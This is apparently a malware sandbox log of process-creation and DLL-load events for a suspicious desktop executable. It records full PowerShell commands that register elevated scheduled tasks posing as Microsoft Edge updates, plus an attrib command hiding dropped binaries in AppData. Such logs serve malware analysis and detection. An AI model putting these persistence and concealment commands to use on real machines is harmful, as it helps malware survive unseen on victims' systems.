Source: unknownProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\LineInst.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\LineInst.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
